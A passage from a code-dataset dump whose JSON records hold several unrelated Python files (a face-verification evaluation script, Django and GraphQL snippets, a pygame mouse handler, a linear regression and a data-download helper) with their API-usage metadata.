"sklearn.datasets.load_boston", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "501768315", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 09:57:19 2019\n\n@author: taozhu\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport math\nfrom scipy import interpolate\nfrom sklearn import metrics\nimport torch\nimport cfg\nimport cv2\nimport pandas as pd\nimport argparse\nfrom scipy.optimize import brentq\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom model import LightCNN_29Layers_v3\nfrom model import l2_norm\n\n\ndef p_args():\n parser = argparse.ArgumentParser(description='lightcnn_train_gt',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--session_name', default='light_no_arc')\n parser.add_argument(\n '--csv_path', default='./save/csv2/valid_data_done.csv')\n parser.add_argument('--pretrained_weights_path', default='./save/weights')\n\n # train\n parser.add_argument('--pretrained', default=True, type=bool)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--cuda', default=False, type=bool)\n parser.add_argument('--num_workers', default=8, type=int)\n parser.add_argument('--pin_memory', default=True, type=bool)\n parser.add_argument('--epoch', default=1000, type=int)\n parser.add_argument('--trainval_split', default=0.1, type=int)\n\n # adjust\n parser.add_argument('--lr', default=1e-6, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight_decay', default=1e-4, type=float)\n\n args = parser.parse_args()\n return args\n\n\ndef read_pairs(pairs_filename):\n pairs = []\n with open(pairs_filename, 'r') as f:\n for line in f.readlines()[1:]:\n pair = line.strip().split()\n pairs.append(pair)\n return np.array(pairs)\n\n\ndef add_extension(path):\n if os.path.exists(path+'.jpg'):\n return path+'.jpg'\n elif os.path.exists(path+'.png'):\n return path+'.png'\n else:\n raise RuntimeError('No file \"%s\" with extension png or jpg.' % path)\n\n\ndef get_paths(csv):\n data = pd.read_csv(csv)\n nrof_skipped_pairs = 0\n path_list = []\n issame_list = []\n for index in data.index:\n if int(data.loc[index]['label']) == 1:\n path0 = data.loc[index]['s1']\n path1 = data.loc[index]['s2']\n issame = True\n else:\n path0 = data.loc[index]['s1']\n path1 = data.loc[index]['s2']\n issame = False\n # Only add the pair if both paths exist\n if os.path.exists(path0) and os.path.exists(path1):\n path_list += (path0, path1)\n issame_list.append(issame)\n else:\n nrof_skipped_pairs += 1\n if nrof_skipped_pairs > 0:\n print('Skipped %d image pairs' % nrof_skipped_pairs, flush=True)\n\n return path_list, issame_list\n\n\ndef distance(embeddings1, embeddings2, distance_metric=0):\n if distance_metric == 0:\n # Euclidian distance\n diff = np.subtract(embeddings1, embeddings2)\n dist = np.sum(np.square(diff), 1)\n elif distance_metric == 1:\n # Distance based on cosine similarity\n dot = np.sum(np.multiply(embeddings1, embeddings2), axis=1)\n norm = np.linalg.norm(embeddings1, axis=1) * \\\n np.linalg.norm(embeddings2, axis=1)\n similarity = dot / norm\n dist = np.arccos(similarity) / math.pi\n else:\n raise 'Undefined distance metric %d' % distance_metric\n\n return dist\n\n\ndef calculate_accuracy(threshold, dist, actual_issame):\n predict_issame = np.less(dist, threshold)\n tp = np.sum(np.logical_and(predict_issame, actual_issame))\n fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n tn = np.sum(np.logical_and(np.logical_not(\n predict_issame), np.logical_not(actual_issame)))\n fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))\n\n tpr = 0 if (tp+fn == 0) else float(tp) / float(tp+fn)\n fpr = 0 if (fp+tn == 0) else float(fp) / float(fp+tn)\n acc = float(tp+tn)/dist.size\n return tpr, fpr, acc\n\n\ndef calculate_val_far(threshold, dist, actual_issame):\n predict_issame = np.less(dist, threshold)\n true_accept = np.sum(np.logical_and(predict_issame, actual_issame))\n false_accept = np.sum(np.logical_and(\n predict_issame, np.logical_not(actual_issame)))\n n_same = np.sum(actual_issame)\n n_diff = np.sum(np.logical_not(actual_issame))\n val = float(true_accept) / float(n_same)\n far = float(false_accept) / float(n_diff)\n return val, far\n\n\ndef calculate_val(thresholds, embeddings1, embeddings2, actual_issame, far_target, nrof_folds=10, distance_metric=0, subtract_mean=False):\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n val = np.zeros(nrof_folds)\n far = np.zeros(nrof_folds)\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n mean = np.mean(np.concatenate(\n [embeddings1[train_set], embeddings2[train_set]]), axis=0)\n else:\n mean = 0.0\n dist = distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the threshold that gives FAR = far_target\n far_train = np.zeros(nrof_thresholds)\n for threshold_idx, threshold in enumerate(thresholds):\n _, far_train[threshold_idx] = calculate_val_far(\n threshold, dist[train_set], actual_issame[train_set])\n if np.max(far_train) >= far_target:\n f = interpolate.interp1d(far_train, thresholds, kind='slinear')\n threshold = f(far_target)\n else:\n threshold = 0.0\n\n val[fold_idx], far[fold_idx] = calculate_val_far(\n threshold, dist[test_set], actual_issame[test_set])\n\n val_mean = np.mean(val)\n far_mean = np.mean(far)\n val_std = np.std(val)\n return val_mean, val_std, far_mean\n\n\ndef calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, nrof_folds=10, distance_metric=0, subtract_mean=False):\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tprs = np.zeros((nrof_folds, nrof_thresholds))\n fprs = np.zeros((nrof_folds, nrof_thresholds))\n accuracy = np.zeros((nrof_folds))\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n mean = np.mean(np.concatenate(\n [embeddings1[train_set], embeddings2[train_set]]), axis=0)\n else:\n mean = 0.0\n dist = distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the best threshold for the fold\n acc_train = np.zeros((nrof_thresholds))\n for threshold_idx, threshold in enumerate(thresholds):\n _, _, acc_train[threshold_idx] = calculate_accuracy(\n threshold, dist[train_set], actual_issame[train_set])\n best_threshold_index = np.argmax(acc_train)\n for threshold_idx, threshold in enumerate(thresholds):\n tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = calculate_accuracy(\n threshold, dist[test_set], actual_issame[test_set])\n _, _, accuracy[fold_idx] = calculate_accuracy(\n thresholds[best_threshold_index], dist[test_set], actual_issame[test_set])\n\n tpr = np.mean(tprs, 0)\n fpr = np.mean(fprs, 0)\n print(\"best_threshold:\", thresholds[best_threshold_index], flush=True)\n return tpr, fpr, accuracy\n\n\ndef lfw_evaluate(embeddings, actual_issame, nrof_folds=10, distance_metric=0, subtract_mean=False):\n # Calculate evaluation metrics\n thresholds = np.arange(0, 4, 0.01)\n embeddings1 = embeddings[0::2]\n embeddings2 = embeddings[1::2]\n tpr, fpr, accuracy = calculate_roc(thresholds, embeddings1, embeddings2,\n np.asarray(actual_issame), nrof_folds=nrof_folds, distance_metric=distance_metric, subtract_mean=subtract_mean)\n thresholds = np.arange(0, 4, 0.001)\n val, val_std, far = calculate_val(thresholds, embeddings1, embeddings2,\n np.asarray(actual_issame), 1e-3, nrof_folds=nrof_folds, distance_metric=distance_metric, subtract_mean=subtract_mean)\n return tpr, fpr, accuracy, val, val_std, far\n\n\ndef merge_eval(model_name_list):\n print('star merge eval!', flush=True)\n args = p_args()\n\n model_list = []\n for model_name in model_name_list:\n model = LightCNN_29Layers_v3(num_classes=8642, args=args)\n pre_dict = torch.load(os.path.join(\n './save/weights', model_name), map_location='cpu')['state_dict']\n if model_name == 'lightCNN_62_checkpoint.pth.tar':\n pre_dict = {k[7:]: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n else:\n pre_dict = {k: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n model_dict = model.state_dict()\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n\n if args.cuda:\n model = model.cuda()\n\n model_list.append(model)\n\n trans = transforms.Compose([\n transforms.Grayscale(),\n # transforms.Normalize((127.5, ), (128, )),\n transforms.ToTensor()\n ])\n\n paths, actual_issame = get_paths('./save/csv2/noise_pair.csv')\n embeddings = []\n for path in paths:\n img = Image.open(path)\n img = trans(img)\n if args.cuda:\n img = img.cuda()\n fc = np.mean(np.concatenate([model(img.unsqueeze(0))[\n 1].detach().cpu().numpy() for model in model_list], 0), axis=0, keepdims=True)\n embeddings.append(fc)\n embeddings = np.concatenate(embeddings, 0)\n tpr, fpr, accuracy, val, val_std, far = lfw_evaluate(\n embeddings, actual_issame, nrof_folds=10, distance_metric=1, subtract_mean=False)\n print('Accuracy: %2.5f+-%2.5f' %\n (np.mean(accuracy), np.std(accuracy)), flush=True)\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' %\n (val, val_std, far), flush=True)\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc, flush=True)\n eer = brentq(lambda x: 1. - x - interpolate.interp1d(fpr, tpr)(x), 0., 1.)\n print('Equal Error Rate (EER): %1.3f' % eer, flush=True)\n\n\ndef single_eval():\n print('star single eval!', flush=True)\n args = p_args()\n model = LightCNN_29Layers_v3(num_classes=8642, args=args)\n pre_dict = torch.load(os.path.join(\n './save/weights', 'lightCNN_62_checkpoint.pth.tar'), map_location='cpu')['state_dict']\n pre_dict = {k[7:]: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n # pre_dict = torch.load(os.path.join(\n # './save/weights', '605.pth.tar'), map_location='cpu')['state_dict']\n # pre_dict = {k: v for k, v in pre_dict.items(\n # ) if 'fc2' not in k and 'arc' not in k}\n model_dict = model.state_dict()\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n\n if args.cuda:\n model = model.cuda()\n\n trans = transforms.Compose([\n transforms.Grayscale(),\n # transforms.Normalize((127.5, ), (128, )),\n # transforms.Resize((112, 112)),\n transforms.ToTensor()\n ])\n\n paths, actual_issame = get_paths('./save/csv2/ca_lfw.csv')\n embeddings = []\n for path in paths:\n img = Image.open(path)\n img = trans(img)\n if args.cuda:\n img = img.cuda()\n _, fc = model(img.unsqueeze(0))\n # norm?\n # fc = l2_norm(fc)\n embeddings.append(fc.detach().cpu().numpy())\n embeddings = np.concatenate(embeddings, 0)\n\n tpr, fpr, accuracy, val, val_std, far = lfw_evaluate(\n embeddings, actual_issame, nrof_folds=10, distance_metric=1, subtract_mean=False)\n print('Accuracy: %2.5f+-%2.5f' %\n (np.mean(accuracy), np.std(accuracy)), flush=True)\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' %\n (val, val_std, far), flush=True)\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc, flush=True)\n eer = brentq(lambda x: 1. - x - interpolate.interp1d(fpr, tpr)(x), 0., 1.)\n print('Equal Error Rate (EER): %1.3f' % eer, flush=True)\n\n\nif __name__ == '__main__':\n single_eval()\n # merge_eval(['506.pth.tar','605.pth.tar','701.pth.tar','800.pth.tar'])\n # merge_eval(['506.pth.tar', 'lightCNN_62_checkpoint.pth.tar'])", "sub_path": "train/star_eval.py", "file_name": "star_eval.py", "file_ext": "py", "file_size_in_byte": 12908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.subtract", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 109, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.less", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.less", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 168, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 230, "usage_type": "call"}, {"api_name": "model.LightCNN_29Layers_v3", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "model.state_dict", "line_number": 249, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 251, "usage_type": "call"}, {"api_name": "model.cuda", "line_number": 254, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 258, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 258, "usage_type": "name"}, {"api_name": "torchvision.transforms.Grayscale", "line_number": 259, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 259, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 261, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 267, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 267, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 278, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 282, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 282, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 284, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 284, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 284, "usage_type": "name"}, {"api_name": "model.LightCNN_29Layers_v3", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "model.state_dict", "line_number": 300, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 302, "usage_type": "call"}, {"api_name": "model.cuda", "line_number": 305, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 307, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 307, "usage_type": "name"}, {"api_name": "torchvision.transforms.Grayscale", "line_number": 308, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 308, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 311, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 311, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 317, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 330, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 334, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 334, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 336, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 336, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 336, "usage_type": "name"}]} +{"seq_id": "224422914", "text": "# References from\n# https://stackoverflow.com/questions/25291466/django-rest-framework-file-upload-with-nested-writable-serializers\nfrom django.http import QueryDict\nfrom formencode.variabledecode import variable_decode\nfrom rest_framework import parsers\n\n\nclass MultipartFormencodeParser(parsers.MultiPartParser):\n def parse(self, stream, media_type=None, parser_context=None):\n result = super().parse(\n stream,\n media_type=media_type,\n parser_context=parser_context\n )\n data = variable_decode(result.data)\n\n qdict = QueryDict('', mutable=True)\n qdict.update(data)\n data_and_files = parsers.DataAndFiles(qdict, result.files)\n return data_and_files", "sub_path": "webserver/apps/commons/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.parsers.MultiPartParser", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.parsers", "line_number": 8, "usage_type": "name"}, {"api_name": "formencode.variabledecode.variable_decode", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.QueryDict", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework.parsers.DataAndFiles", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.parsers", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "399878666", "text": "import pygame\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom pygame.locals import *\nimport eventmanager\n\nBUTTON_PRESSED = 0\nBUTTON_HOLD = 1\nBUTTON_RELEASED = 2\nBUTTON_INACTIVE = 3\n\nclass maus(object):\n def __init__(self):\n self.pressed = [False,False,False]\n self.hold = [False,False,False]\n self.release = [False, False, False]\n self.inactive = [True,True,True]\n\n self.pos = (0,0)\n \n def update(self):\n pressed = pygame.mouse.get_pressed()\n self.pos = pygame.mouse.get_pos()\n for i in range(3):\n\n if self.pressed[i]:\n self.pressed[i] = False\n self.hold[i] = True\n\n if self.release[i]:\n self.release[i] = False\n self.inactive[i] = True\n\n if pressed[i]:\n if self.inactive[i]:\n self.inactive[i] = False\n self.pressed[i] = True\n else:\n if self.hold[i]:\n self.hold[i] = False\n self.release[i] = True\n\n\n\n\n def getState(self,button):\n if self.pressed[button]:\n \n return BUTTON_PRESSED\n elif self.release[button]:\n \n return BUTTON_RELEASED\n\n elif self.hold[button]:\n return BUTTON_HOLD\n\n return BUTTON_INACTIVE\n\n def getPos(self):\n return self.pos\n ", "sub_path": "simongame/maus.py", "file_name": "maus.py", "file_ext": "py", "file_size_in_byte": 1423, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.mouse.get_pressed", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "85094619", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('is_logged_in', views.is_logged_in, name='is_logged_in'),\n path('register', views.save_user_token, name='register'),\n path('get_pages', views.get_pages, name='get_pages'),\n path('update_page', views.update_page_info, name='update_page'),\n path('revoke', views.revoke_all_permissions, name='revoke'),\n]\n", "sub_path": "FacebookManager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "367531733", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nos.chdir(r'g:\\\\Programs\\\\python\\\\Machine Learning\\\\Linear Regression')\n\ndatas = pd.read_csv('example.csv')\nprint(datas.shape)\ndatas.head()\n\nX = datas[datas.columns[0]].values\nY = datas[datas.columns[1]].values\nprint(X)\nprint(Y)\n\nmean_x = np.mean(X)\nmean_y = np.mean(Y)\n\nn = len(X)\n\n## SEARCH FOR M & (C)OEF\nm_atas = 0\nm_bawah = 0\nfor i in range(n):\n m_atas += (X[i] - mean_x) * (Y[i] - mean_y)\n m_bawah += (X[i] - mean_x)**2\n\n# mean_y = m * mean_x + c\nm = m_atas / m_bawah\nc = mean_y - (m * mean_x)\nprint(\"{} = {} * {} + {}\".format(mean_y, m, mean_x, c))\nprint(mean_y)\npredicted_y = []\n\nfor i in range (len(X)):\n y = m * X[i] + c\n predicted_y.append(y) # h_theta_xi\n\nss_t = 0\nss_r = 0\n\nfor i in range (n):\n y_predic = m * X[i] + c\n ss_t += (Y[i] - mean_y) ** 2\n ss_r += (Y[i] - predicted_y[i]) ** 2\nError = ss_r / ss_t\nr2 = 1 - Error\nprint(r2)\n\n# plt.axis([0, 100, 0, 100])\nplt.plot(X, Y, \"o\")\nplt.plot(X, predicted_y)\nplt.show()\n", "sub_path": "Linear Regression/linear_reg.py", "file_name": "linear_reg.py", "file_ext": "py", "file_size_in_byte": 1034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "322720845", "text": "import graphene\n\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom products import models\n\n\nclass ProductType(DjangoObjectType):\n class Meta:\n model = models.Product\n filter_fields = {\n 'title': ['exact', 'icontains'],\n 'description': ['exact', 'icontains'],\n }\n interfaces = (graphene.relay.Node,)\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = models.Category\n filter_fields = {\n 'title': ['exact', 'icontains'],\n }\n interfaces = (graphene.relay.Node,)\n\n\nclass Query(graphene.AbstractType):\n products = DjangoFilterConnectionField(ProductType)\n category = DjangoFilterConnectionField(CategoryType)\n\n def resolve_products(self, info, **kwargs):\n return models.Product.objects.all()\n\n def resolve_category(self, info, **kwargs):\n return models.Category.objects.all()\n\nclass CreateCategory(graphene.Mutation):\n class Arguments:\n title = graphene.String()\n\n ok = graphene.Boolean()\n\n def mutate(self, info, title):\n models.Category(title=title).save()\n return CreateCategory(ok=True)", "sub_path": "products/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "graphene_django.types.DjangoObjectType", "line_number": 9, "usage_type": "name"}, {"api_name": "products.models.Product", "line_number": 11, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 11, "usage_type": "name"}, {"api_name": "graphene.relay", "line_number": 16, "usage_type": "attribute"}, {"api_name": "graphene_django.types.DjangoObjectType", "line_number": 19, "usage_type": "name"}, {"api_name": "products.models.Category", "line_number": 21, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 21, "usage_type": "name"}, {"api_name": "graphene.relay", "line_number": 25, "usage_type": "attribute"}, {"api_name": "graphene.AbstractType", "line_number": 28, "usage_type": "attribute"}, {"api_name": "graphene_django.filter.DjangoFilterConnectionField", "line_number": 29, "usage_type": "call"}, {"api_name": "graphene_django.filter.DjangoFilterConnectionField", "line_number": 30, "usage_type": "call"}, {"api_name": "products.models.Product.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "products.models.Product", "line_number": 33, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 33, "usage_type": "name"}, {"api_name": "products.models.Category.objects.all", "line_number": 36, "usage_type": "call"}, {"api_name": "products.models.Category", "line_number": 36, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 36, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 38, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 40, "usage_type": "call"}, {"api_name": "graphene.Boolean", "line_number": 42, "usage_type": "call"}, {"api_name": "products.models.Category", "line_number": 45, "usage_type": "call"}, {"api_name": "products.models", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "461568786", "text": "\nimport requests \nimport os \nfrom tqdm import tqdm\nimport re\nimport tarfile\nfrom pprint import pprint\nimport pandas as pd\nimport numpy as np\n\n\nworking_directory=os.getcwd()\n\n\n#pass header as True to get header information\n#pass download as False to disable download\ndef download_database(download=True,header=False) :\n url=\"http://kookaburra.phyast.pitt.edu/hillier/cmfgen_files/atomic_data_15nov16.tar.gz\"\n h = requests.head(url, allow_redirects=True)\n header = h.headers\n filelength=int(header[\"Content-Length\"])\n\n if header :\n \n print(\"Content Type : \",header[\"content-type\"])\n print(\"Last Modified :\",header[\"Last-Modified\"])\n print(\"Todays Date :\",header[\"Date\"])\n print(\"File Size 